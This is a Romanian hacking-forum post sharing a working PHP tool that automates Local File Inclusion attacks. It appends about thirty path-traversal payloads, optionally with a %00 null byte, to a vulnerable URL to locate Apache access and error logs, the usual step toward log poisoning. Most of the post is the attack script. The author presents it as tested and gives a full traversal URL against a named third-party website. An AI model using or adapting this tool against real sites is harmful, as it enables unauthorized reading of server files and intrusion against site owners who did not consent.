Jump to content
crs12decoder

LFI .log checker

Recommended Posts

Posted

[edit] i-am facut si o interfata html

am facut un checker pentru fisierele log pt LFI. Ca sa nu le mai cauti manual.

L-am pus sa incerce fiecare link in parte si sa numere liniile de cod...(sunt sanse mici sa fie acelasi nr de linii de cod in logfile ca in celelalte pagini). Cand gaseste fisierul .log vi-l afiseaza cu bold, va afiseaza liniile, si link-ul catre fisier

Am pus si optiune pt folosirea nullbyte-ului (%00).

Introduceti link-ul radacina vulnerabil la LFI ex "http://www.pagina.com?pagina=".

Si setati daca sa foloseasca sau nu nullbyte adica %00 ala de la sfarsit.

Scriptu' e testat de mine si merge.. :)..

aici cod:


<form action="" method="post">
link:<input type="text" name="link"><br>
nullbyte:<input type="checkbox" name="check">(%00)<br>
<input type="submit" name="submit" value="submit>
</form>
<?php
if(isset($_POST['submit'])){
if (isset($_POST['check'])){$nullbyte=1;}else{$nullbyte=0;}
$link = $_POST['link'];
$array = array(
1 => '../apache/logs/error.log',
2 => '../apache/logs/access.log',
3 => '../../apache/logs/error.log',
4 => '../../apache/logs/access.log',
5 => '../../../apache/logs/error.log',
6 => '../../../apache/logs/access.log',
7 => '../../../../../../../etc/httpd/logs/acces_log',
8 => '../../../../../../../etc/httpd/logs/acces.log',
9 => '../../../../../../../etc/httpd/logs/error_log',
10 => '../../../../../../../etc/httpd/logs/error.log',
11 => '../../../../../../../var/www/logs/access_log',
12 => '../../../../../../../var/www/logs/access.log',
13 => '../../../../../../../usr/local/apache/logs/access_log',
14 => '../../../../../../../usr/local/apache/logs/access.log',
15 => '../../../../../../../var/log/apache/access_log',
16 => '../../../../../../../var/log/apache2/access_log',
17 => '../../../../../../../var/log/apache/access.log',
18 => '../../../../../../../var/log/apache2/access.log',
19 => '../../../../../../../var/log/access_log',
20 => '../../../../../../../var/log/access.log',
21 => '../../../../../../../var/www/logs/error_log',
22 => '../../../../../../../var/www/logs/error.log',
23 => '../../../../../../../usr/local/apache/logs/error_log',
24 => '../../../../../../../usr/local/apache/logs/error.log',
25 => '../../../../../../../var/log/apache/error_log',
26 => '../../../../../../../var/log/apache2/error_log',
27 => '../../../../../../../var/log/apache/error.log',
28 => '../../../../../../../var/log/apache2/error.log',
29 => '../../../../../../../var/log/error_log',
30 => '../../../../../../../var/log/error.log'
);

$counter=count(file($link.$array[1]));
for ($i=1; $i<=30; $i++){
if ($nullbyte==1){$array[$i]=$array[$i].'%00';}
$fcounter=count(file($link.$array[$i]));
echo $i.') ';
if($counter!=$fcounter){
echo "<b>".$fcounter." = ".$link.$array[$i].'</b>';
}else{
echo $fcounter." = ".$link.$array[$i];;
}
echo "<br>";
}
}
?>

pt russpry link-ul cu logfile-u l-a gasit ca fiind http://www.russpry.com/index.php?page=../../../../../../../etc/httpd/logs/error_log%00

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...